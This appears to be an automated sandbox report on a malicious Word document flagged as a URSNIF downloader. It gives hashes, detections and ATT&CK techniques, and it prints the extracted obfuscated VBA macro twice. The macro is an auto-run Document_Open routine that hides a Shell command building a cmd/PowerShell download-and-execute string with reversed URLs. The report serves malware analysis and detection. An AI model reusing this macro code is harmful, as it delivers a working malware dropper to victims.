Office (OLE) malware analysis — malicious · e8da211413e494ab

MALICIOUS

Office (OLE)

79.1 KB Created: 2018-09-10 21:46:00 Authoring application: Microsoft Office Word First seen: 2018-11-20

MD5: a20b7ef0a54ebdc43dfa3d0a49c02054 SHA-1: eec368a4db4c42ef511eba494fd3c7ad32c99e8e SHA-256: e8da211413e494aba4f2ae0751aff70ef3d149e5b2ef45527dfd3ada5cbf62ee

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates an attempt to download and run a secondary payload. The ClamAV detection suggests this is a known downloader family, likely URSNIF, but specific IOCs for the payload are not present in this sample.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6423 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6423 bytes
SHA-256: `b86db82e910b167bb309538b884b991acc58171e2890dfa77c97949e926f5292`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AllvOMTB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Second "395821486" + "342217374" + "EIWur" + "313644261" Second "Vimr" + "anpNjfstq" Second "KWCAZPIPUh" + "416930175" + "obAnGMJzFZoN" + "GvsF" Second "86084626" + "CdwbUb" + "OZEULLD" + "z" Second "322368232" + "8837" Shell PnRkzQw + fidFPF + ZzPAtknVAkj, CStr(vbHide) Second "l" + "lLVJIudX" End Sub Attribute VB_Name = "jOnLdYSf" Function PnRkzQw() On _ Error _ Resume _ Next Second "mCSh" + "h" + "386609376" + "101517046" Second "drA" + "FzBWGkXDPffKN" FOBkvft = Format(Chr(18 + 0 + 14 + 9 + 58)) + "md /V" + ":" + "/" + Format(Chr(12 + 0 + 10 + 6 + 39)) + Format(Chr(5 + 0 + 4 + 2 + 23)) + "^se" + "^" + "t ^U" Second "l" + "pQnHVBNrAPhN" + "fKKuODBAjYVi" + "PIX" Second "n" + "1785" + "9320" + "355708104" Second "2677965" + "L" Second "8859" + "opz" Second "137704104" + "8417" vMHjrz = "K^" + "B" + "J=^" + " " + " ^ ^ " + "^" + " ^ " + "^ " + "^ " + "^ ^ " Second "132397576" + "wMB" Second "rS" + "894" + "8595" + "Hl" Second "LAiJmRhbzTNzQV" + "j" oVSTfQLaz = "^" + " }" + "^}{^" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^ta" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^}^;^" + "k^a^e" + "r^b;^k" + "vb^$ " + "met^I-" + "e^kovn^" Second "1700" + "m" Second "uSIR" + "CCTrzHnHQvuai" YqqiOwrHk = "I^" + ";)^kv" + "b^$^ ," + "Tw^H^" + "$(e" + "^l^i" + "F^daoln" + "^w" + "oD^.jNz" + "^" + "$^" + "{^yr" Second "z" + "1005" + "Wwnq" + "63015192" Second "HGJaZD" + "1805" Second "APwJ" + "37477815" + "fSrpKtTipV" + "2045" Second "pkf" + "bCAEf" FTbJAGQRK = "t" + "^{)" + "^G^" + "m^l^" + "$" + " n" + "^" + "i" + "^ ^" + "Tw^H^$(" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "aer" Second "178504350" + "mN" Second "PfOuquNp" + "1317" + "4675" + "OJwZ" Second "QAjGPoFowTNZw" + "IQmcuUzGpVGdQZ" Second "3404" + "MZ" nvVUjEwpwiX = "of;'e" + "xe.'+P^" + "dY^$" + "^+'\'" + "+" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "il" + "bup^:" + "vne^" + "$" Second "SZN" + "83531853" Second "456667176" + "bjZz" + "6891" + "lG" Second "iwwKKNz" + "XfrihzBpAjk" + "dnj" + "rUPRQQISvCiZJ" Second "348223645" + "FpNARi" Second "154432135" + "426970889" cBoQw = "=^k" + "vb$^;'^" + "8" + "6^2" + "' ^=" + " ^P" + "^d^Y^$" + "^;)^'" Second "nFnXzk" + "HGqPDSqw" + "UHXZnf" + "cfO" Second "3672" + "nwrJG" Second "440736026" + "nPEd" + "KjJisQ" + "413250783" OMpBarZtUG = "@'(^" + "t^" + "il" + "^p^S." + "'^F" Second "Qfn" + "jin" Second "65712580" + "c" + "zBzjZSZvpzvW" + "vpR" Second "2184" + "PsSpj" + "7869" + "169444804" Second "rtbh" + "tIoLrkVcUqml" + "8896" + "HK" Second "SAfCvT" + "9070" + "FY" + "488034354" TcXXjrEjXvE = "H^" + "4^9rr" + "^t" + "U" + "/r^" + "i.^" + "gnar" + "u^o/" + "/:p^" + "t^th@" Second "328180639" + "qWQ" Second "LzFfd" + "5737" + "urjZ" + "316671595" Second "7178" + "4226" + "1226" + "zhzViLD" Second "IqiqlT" + "7274" Second "Ft" + "BXzF" PctSMRAj = "9TR^d" + "^3" + "f" + "T6" + "/^a^u" + ".p^d.a" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^il^es" + "ovo" + "n//^:" + "^ptt" + "^h@v^mT" + "dvJ/mo" + Format(Chr(18 + 0 + 14 + 9 + 58)) PnRkzQw = FOBkvft + vMHjrz + oVSTfQLaz + YqqiOwrHk + FTbJAGQRK + nvVUjEwpwiX + cBoQw + OMpBarZtUG + TcXXjrEjXvE + PctSMRAj Second "385788065" + "116672357" Second "iOvwwbG" + "N" + "1183" + "NOcjS" End Function Function fidFPF() On _ Error _ Resume _ Next Second "TJD" + "bHj" + "Di" + "iFTDr" Second "VbokqVMr" + "uFEQ" Second "wCJudFam" + "tMHLztz" FJYRtRJ = "^.^y" + "n" + "^" + "a^p^m^" + "o" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "-" + "nny^" Second "9068" + "9131" Second "fzipXpC" + "TcpFFtHqJKQwJ" Second "496444163" + "GjlmMkFRnG" + "KD" + "MTS" Second "mfLj" + "wzd" Q ... (truncated)

SHA-256: b86db82e910b167bb309538b884b991acc58171e2890dfa77c97949e926f5292

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AllvOMTB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "395821486" + "342217374" + "EIWur" + "313644261"
   Second "Vimr" + "anpNjfstq"
   Second "KWCAZPIPUh" + "416930175" + "obAnGMJzFZoN" + "GvsF"
   Second "86084626" + "CdwbUb" + "OZEULLD" + "z"
   Second "322368232" + "8837"
Shell PnRkzQw + fidFPF + ZzPAtknVAkj, CStr(vbHide)
   Second "l" + "lLVJIudX"
End Sub



Attribute VB_Name = "jOnLdYSf"
Function PnRkzQw()

On _
Error _
Resume _
Next
Second "mCSh" + "h" + "386609376" + "101517046"
   Second "drA" + "FzBWGkXDPffKN"
FOBkvft = Format(Chr(18 + 0 + 14 + 9 + 58)) + "md /V" + ":" + "/" + Format(Chr(12 + 0 + 10 + 6 + 39)) + Format(Chr(5 + 0 + 4 + 2 + 23)) + "^se" + "^" + "t ^U"
Second "l" + "pQnHVBNrAPhN" + "fKKuODBAjYVi" + "PIX"
   Second "n" + "1785" + "9320" + "355708104"
   Second "2677965" + "L"
   Second "8859" + "opz"
   Second "137704104" + "8417"
vMHjrz = "K^" + "B" + "J=^" + " " + " ^  ^  " + "^" + " ^ " + "^   " + "^   " + "^ ^ "
Second "132397576" + "wMB"
   Second "rS" + "894" + "8595" + "Hl"
   Second "LAiJmRhbzTNzQV" + "j"
oVSTfQLaz = "^" + " }" + "^}{^" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^ta" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^}^;^" + "k^a^e" + "r^b;^k" + "vb^$ " + "met^I-" + "e^kovn^"
Second "1700" + "m"
   Second "uSIR" + "CCTrzHnHQvuai"
YqqiOwrHk = "I^" + ";)^kv" + "b^$^ ," + "Tw^H^" + "$(e" + "^l^i" + "F^daoln" + "^w" + "oD^.jNz" + "^" + "$^" + "{^yr"
Second "z" + "1005" + "Wwnq" + "63015192"
   Second "HGJaZD" + "1805"
   Second "APwJ" + "37477815" + "fSrpKtTipV" + "2045"
   Second "pkf" + "bCAEf"
FTbJAGQRK = "t" + "^{)" + "^G^" + "m^l^" + "$" + " n" + "^" + "i" + "^ ^" + "Tw^H^$(" + "h" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "aer"
Second "178504350" + "mN"
   Second "PfOuquNp" + "1317" + "4675" + "OJwZ"
   Second "QAjGPoFowTNZw" + "IQmcuUzGpVGdQZ"
   Second "3404" + "MZ"
nvVUjEwpwiX = "of;'e" + "xe.'+P^" + "dY^$" + "^+'\'" + "+" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "il" + "bup^:" + "vne^" + "$"
Second "SZN" + "83531853"
   Second "456667176" + "bjZz" + "6891" + "lG"
   Second "iwwKKNz" + "XfrihzBpAjk" + "dnj" + "rUPRQQISvCiZJ"
   Second "348223645" + "FpNARi"
   Second "154432135" + "426970889"
cBoQw = "=^k" + "vb$^;'^" + "8" + "6^2" + "' ^=" + " ^P" + "^d^Y^$" + "^;)^'"
Second "nFnXzk" + "HGqPDSqw" + "UHXZnf" + "cfO"
   Second "3672" + "nwrJG"
   Second "440736026" + "nPEd" + "KjJisQ" + "413250783"
OMpBarZtUG = "@'(^" + "t^" + "il" + "^p^S." + "'^F"
Second "Qfn" + "jin"
   Second "65712580" + "c" + "zBzjZSZvpzvW" + "vpR"
   Second "2184" + "PsSpj" + "7869" + "169444804"
   Second "rtbh" + "tIoLrkVcUqml" + "8896" + "HK"
   Second "SAfCvT" + "9070" + "FY" + "488034354"
TcXXjrEjXvE = "H^" + "4^9rr" + "^t" + "U" + "/r^" + "i.^" + "gnar" + "u^o/" + "/:p^" + "t^th@"
Second "328180639" + "qWQ"
   Second "LzFfd" + "5737" + "urjZ" + "316671595"
   Second "7178" + "4226" + "1226" + "zhzViLD"
   Second "IqiqlT" + "7274"
   Second "Ft" + "BXzF"
PctSMRAj = "9TR^d" + "^3" + "f" + "T6" + "/^a^u" + ".p^d.a" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "^il^es" + "ovo" + "n//^:" + "^ptt" + "^h@v^mT" + "dvJ/mo" + Format(Chr(18 + 0 + 14 + 9 + 58))
PnRkzQw = FOBkvft + vMHjrz + oVSTfQLaz + YqqiOwrHk + FTbJAGQRK + nvVUjEwpwiX + cBoQw + OMpBarZtUG + TcXXjrEjXvE + PctSMRAj
   Second "385788065" + "116672357"
   Second "iOvwwbG" + "N" + "1183" + "NOcjS"
End Function
Function fidFPF()

On _
Error _
Resume _
Next
Second "TJD" + "bHj" + "Di" + "iFTDr"
   Second "VbokqVMr" + "uFEQ"
   Second "wCJudFam" + "tMHLztz"
FJYRtRJ = "^.^y" + "n" + "^" + "a^p^m^" + "o" + Format(Chr(18 + 0 + 14 + 9 + 58)) + "-" + "nny^"
Second "9068" + "9131"
   Second "fzipXpC" + "TcpFFtHqJKQwJ"
   Second "496444163" + "GjlmMkFRnG" + "KD" + "MTS"
   Second "mfLj" + "wzd"
Q
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.